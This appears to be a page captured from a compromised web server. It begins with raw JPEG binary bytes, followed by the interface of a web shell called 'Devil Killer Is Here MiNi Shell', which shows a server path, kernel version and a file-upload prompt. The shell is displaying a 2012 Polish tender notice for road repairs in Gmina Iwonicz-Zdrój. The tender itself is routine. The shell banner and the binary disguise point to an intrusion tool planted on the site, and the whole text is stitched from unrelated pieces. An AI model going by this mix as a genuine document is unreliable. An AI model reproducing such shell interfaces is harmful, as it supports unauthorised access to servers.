JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120926/365776-N-2012.html

<p class="kh_header"><b>Iwonicz-Zdrój: Modernizacja nawierzchni bitumicznych i żwirowych dróg gminnych na terenie Gminy Iwonicz-Zdrój z podziałem na części</b><br>
<b>Numer ogłoszenia: 365776 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Iwonicz-Zdrój , Aleja Słoneczna 28, 38-440 Iwonicz-Zdrój, woj. podkarpackie, tel. 13 435-02-12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwonicz-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja nawierzchni bitumicznych i żwirowych dróg gminnych na terenie Gminy Iwonicz-Zdrój z podziałem na części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

Część I - Modernizacja nawierzchni dróg  bitumicznych:

a)  Remont  drogi gminnej nr ewid. dz.174/2 w m.  Lubatówka:  
    Zakres remontu dł. 47mb, szer. jezdni 3,0-5,8m:
- wykonanie podbudów z kamienia łamanego o gr. po uwałowaniu 12cm na dł. ok. 47mb,
- wykonanie nawierzchni bitumicznej gr. 7cm (4cm - w-wa wiążąca, 3cm - w-wa ścieralna) na odcinku o dł. ok  47mb,
- instalacja poprzecznych ścieków betonowych z kratą przejazdową, na ławie betonowej,  na dł. ok. 8mb,
- uzupełnienie poboczy i zjazdów do nowej niwelety drogi  kruszywem łamanym w ilości 1,75m.3

b) Remont drogi gminnej nr ewid. dz.  2054 w m.  Iwoniczu:
    Zakres remontu dł. 60 mb, szer. jezdni 2,80-3,30m:
      - wykonanie podbudowy z kamienia łamanego o gr. po uwałowaniu 10-30cm na dł. ok  60mb,
      - wykonanie nawierzchni bitumicznej gr. 7cm (4cm - w-wa wiążąca, 3cm - w-wa ścieralna) na odcinku o dł. ok   60 mb,
     - instalacja ścieku betonowego  otwartego na ławie betonowej, na dł. ok. 34 mb 
     - regulacja  pionowa włazów kanałowych w ilości 3 szt.
     - uzupełnienie poboczy szer. do 0,5m i zjazdów kruszywem łamanym.

c) Remont drogi gminnej nr ewid. dz. 5017 w m.  Iwoniczu:
    Zakres remontu dł. 210 mb, szer. jezdni 2,80-3,00m:
 -  profilowanie i zagęszczanie mechaniczne podłoża pod warstwy konstrukcyjne na cale j szerokości jezdni w ilości 651,00m2.    
      - wykonanie podbudowy z kamienia łamanego o gr. po uwałowaniu 10cm na dł. ok.  651,00m2,
     - wykonanie nawierzchni bitumicznej gr. 7cm (4cm - w-wa wiążąca, 3cm - w-wa ścieralna) na odcinku o dł. ok 651,00 mb,
     - skropienie nawierzchni asfaltem w ilości 651,00 m2
     - regulacja  pionowa włazów kanałowych w ilości 7 szt.
     - uzupełnienie poboczy szer. do 0,5m i zjazdów kruszywem łamanym.

Szczegółowy zakres prac obejmujący przedmiot zamówienia został określony w załączniku nr 8 - dokumentacja techniczna, specyfikacja techniczna, kosztorysy ślepe - załącznik do pobrania ze strony internetowej Zamawiającego.

Część II - Modernizacja nawierzchni dróg żwirowych:

a) Remnot drogi gminnej nr ewid. dz. 4627/1, 4737  w m.  Iwonicz:
   Zakres remontu dł.151mb , szer. planowanej  jezdni 2,9m
    - korytowanie mechaniczne podłoża  o głębokości 20cm na całej szerokości jezdni 
       w  ilości 437,00m2    
    - wykonanie podbudowy  tłuczniowo- klińcowej o gr. po zawałowaniu 25cm na 
        długości ok.  151mb,     
      -  wykonanie nawierzchni tłuczniowo - klińcowej o gr. po zawałowaniu   10 cm,
    -  wykonanie przepustu fi 50cm o długości 7,0m pod zjazdami,
    -   rozebranie płyt pełnych o pow. 9m2 

b) Remont drogi gminnej nr ewid. dz. 5363 w m. Lubatowa:  
     Zakres remontu dł.145mb , szer. planowanej  jezdni 3,0m.
    - korytowanie mechaniczne podłoża  o głębokości 25cm 
       w  ilości 165,00m2    
    - wykonanie podbudowy  tłuczniowo- klińcowej o gr. po zawałowaniu od 15-25cm na 
        długości ok.  145mb,     
      -  wykonanie nawierzchni tłuczniowo - klińcowej o gr. po zawałowaniu   9 cm,
    - regulacja pionowa włazów kanałowych studzienek PCV w ilości 4 szt.

Szczegółowy zakres prac obejmujący przedmiot zamówienia został określony w załączniku nr 9 - dokumentacja techniczna, specyfikacja techniczna, kosztorysy ślepe - załącznik do pobrania ze strony internetowej Zamawiającego.

Zamawiający dopuszcza składanie ofert częściowych, na poszczególne części. Zamawiający będzie rozpatrywał każdą z części oddzielnie. Wykonawca może złożyć ofertę na dowolną ilość części. 



Uwaga!: Wykonawca nie może użyć do realizacji zamówienia wyrobów budowlanych o gorszych parametrach technicznych i jakościowych niż, te wskazane w dokumentacji technicznej.
Jeśli w dokumentacji zostały podane nazwy, symbole i znaki firmowe producentów, dane techniczne 
i opisy technologii to zostały podane jedynie w celu jak najdokładniejszego określenia elementów, urządzeń i materiałów, które mogą być użyte do realizacji przedmiotu zamówienia. Oznacza to, że Wykonawca nie będzie zobowiązany do zastosowania konkretnych wyrobów i że może on stosować inne, pod warunkiem ich zgodności z wyrobami podanymi w dokumentacji.

Wykonawca, który zastosował materiały i urządzenia równoważne, ma obowiązek wskazać w swojej ofercie, jakie materiały i urządzenia zostały zmienione i określić, jakie materiały i urządzenia w ich miejsce proponuje i wykazać równoważność z materiałami zastosowanymi w SIWZ. 
W przypadku złożenia ofert równoważnych należy dołączyć foldery, dane techniczne i aprobaty techniczne dla materiałów i urządzeń równoważnych, zawierające ich parametry techniczne.

3.2. Wykonawca będzie zobowiązany w szczególności do:
1) realizacji przedmiotu zamówienia zgodnie z wymogami prawa budowlanego, wiedzą i sztuką techniczną, obowiązującymi normami technicznymi,
2) wykonania wszystkich prac budowlanych wraz z oznakowaniem i zabezpieczeniem terenu budowy zgodnie z przepisami BHP,
3) uporządkowania terenu budowy i otoczenia po zakończeniu robót,
4) usunięcia na własny koszt awarii i ich skutków jeżeli zostały spowodowane Jego działalnością,
5) złożenia w jednym egzemplarzu dokumentacji powykonawczej zawierającej min.: aprobaty techniczne,  atesty techniczne, certyfikaty badań, itp.,
6) zapewnienia nadzoru nad wykonywanymi robotami przez osobę posiadającą odpowiednie uprawnienia.

3.3.  Zaleca się aby Wykonawca dokonał  wizji lokalnej placu budowy, zapoznał się z przed?miotem zamówienia.

3.4. Okres gwarancji udzielonej przez Wykonawcę musi wynosić co najmniej 24 miesiące na nawierzchnię asfaltową i żwirową. Ustala się okres rękojmi równy okresom  gwarancji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnego w treści ze wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnego w treści ze wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował osobą posiadającą stosowne uprawnienia i kwalifikacje - min.1 osoba kadry technicznej, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.

Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem ort. 12a oraz innych przepisów ustawy Prawo budowlane (Dz.U.2010. nr 243 poz. 1623 z póź. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63 poz. 394).
W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) w/w warunek mogą oni spełnić łącznie.

W przypadku składania ofert na więcej niż jedną część  zamówienia, wystarczające będzie  wykazanie się minimum jedna osobą o wymaganych kwalifikacjach.
		
W celu wykazania spełniania warunku Wykonawca zobowiązany jest:
a) złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
b) złożyć oświadczenie stwierdzające, iż osoby wymienione w wykazie posiadają wymagane przez Zamawiającego uprawnienia,
c) podać informację o podstawie dysponowania osobami ujętymi w wykazie.

Ocena spełniania tego warunku w postępowaniu odbywać się będzie na podstawie dokumentów  i oświadczeń przedłożonych przez Wykonawcę, metodą warunku granicznego /spełnia/nie spełnia/. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak 
w ofercie wymaganych oświadczeń i/lub dokumentów oraz ich nieuzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnego w treści ze wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać:
- formularz oferty wykonania zamówienia, (załącznik nr 1),
- oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,(załącznik nr 2),
- oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, (załącznik nr 3),
- dokumenty i pozostałe oświadczenia wskazane w ust  6 niniejszej specyfikacji,
- pisemne zobowiązanie - jeżeli dotyczy,
- stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie  wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
- w  przypadku Wykonawców  wspólnie  ubiegających  się  o  udzielenie zamówienia,   dokument  ustanawiający  Pełnomocnika  do   reprezentowania  ich   w postępowaniu o udzielenie zamówienia  albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
2. Zmiana terminu realizacji przedmiotu umowy może nastąpić w przypadku wystąpienia następujących przypadków:
1)    zamiany będące następstwem warunków atmosferycznych w szczególności:
a)	klęski żywiołowe,
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów.
2)   Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
w szczególności:
a)	wstrzymanie robót przez Zamawiającego,
b)	konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji.
3) 	Zmiany będące następstwem działania organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.,
b)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji.
4)  Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy  skutkujące niemożliwością prowadzenia prac.
3. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
4. Zmiana sposobu spełnienia świadczenia może nastąpić w przypadku:
1)  Zmiany technologiczne, w szczególności:
a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
c) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa .
 2)  W wypadku zaistnienia sytuacji, w której zajdzie potrzeba wykonania robót zamiennych a to nie spowoduje wadliwego wykonania przedmiotu zamówienia, ani wzrostu ryczałtowego wynagrodzenia określonego w umowie to w  takiej sytuacji:
a) wykonanie robót zamiennych można dokonać na podstawie protokołów konieczności potwierdzonych przez Zamawiającego i Wykonawcę, 
   	  b) wartość robót zamiennych  zostanie ustalona w oparciu o różnicowy kosztorys opracowany przez Wykonawcę i zatwierdzony przez   Zamawiającego.
   c) zostanie przez Strony dokonana zmiana wynagrodzenia   ryczałtowego i ustalenie jego nowej wysokości w formie aneksu do umowy.
	  d) jeśli wartość robót zamiennych nie spowoduje zmiany wartości wynagrodzenia nie będzie potrzebna wprowadzania zmian aneksem do umowy.  
5. Pozostałe zmiany umowy następują w przypadkach:
1)	zmiana obowiązującej stawki VAT:
a) jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę;
b) jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę;
6. Wszystkie  postanowienia zawarte w ust. 2-5  stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
7. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1) opis zmiany,
2) uzasadnienie zmiany,
3) koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4) czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
8. Wprowadzone zmiany wymagają formy pisemnej  pod rygorem nieważności (aneks).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://iwonicz-zdroj.bip.podkarpackie.pl/index.php/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy nw Iwonicz-Zdroju
Al. Słoneczna 28
38-440 Iwonicz-Zdrój
pok. 101 lub 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 11:00, miejsce: Urząd Gminy nw Iwonicz-Zdroju
Al. Słoneczna 28
38-440 Iwonicz-Zdrój
Biuro Obsługi Mieszkańca- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja nawierzchni dróg  bitumicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)  Remont  drogi gminnej nr ewid. dz.174/2 w m.  Lubatówka:  
Zakres remontu dł. 47mb, szer. jezdni 3,0-5,8m:
- wykonanie podbudów z kamienia łamanego o gr. po uwałowaniu 12cm na dł. ok. 47mb,
- wykonanie nawierzchni bitumicznej gr. 7cm (4cm - w-wa wiążąca, 3cm - w-wa ścieralna) na odcinku o dł. ok  47mb,
- instalacja poprzecznych ścieków betonowych z kratą przejazdową, na ławie betonowej,  na dł. ok. 8mb,
- uzupełnienie poboczy i zjazdów do nowej niwelety drogi  kruszywem łamanym w ilości 1,75m.3

b) Remont drogi gminnej nr ewid. dz.  2054 w m.  Iwoniczu:
    Zakres remontu dł. 60 mb, szer. jezdni 2,80-3,30m:
      - wykonanie podbudowy z kamienia łamanego o gr. po uwałowaniu 10-30cm na dł. ok  60mb,
      - wykonanie nawierzchni bitumicznej gr. 7cm (4cm - w-wa wiążąca, 3cm - w-wa ścieralna) na odcinku o dł. ok   60 mb,
     - instalacja ścieku betonowego  otwartego na ławie betonowej, na dł. ok. 34 mb 
     - regulacja  pionowa włazów kanałowych w ilości 3 szt.
     - uzupełnienie poboczy szer. do 0,5m i zjazdów kruszywem łamanym.

c) Remont drogi gminnej nr ewid. dz. 5017 w m.  Iwoniczu:
    Zakres remontu dł. 210 mb, szer. jezdni 2,80-3,00m:
 -  profilowanie i zagęszczanie mechaniczne podłoża pod warstwy konstrukcyjne na cale j szerokości jezdni w ilości 651,00m2.    
      - wykonanie podbudowy z kamienia łamanego o gr. po uwałowaniu 10cm na dł. ok.  651,00m2,
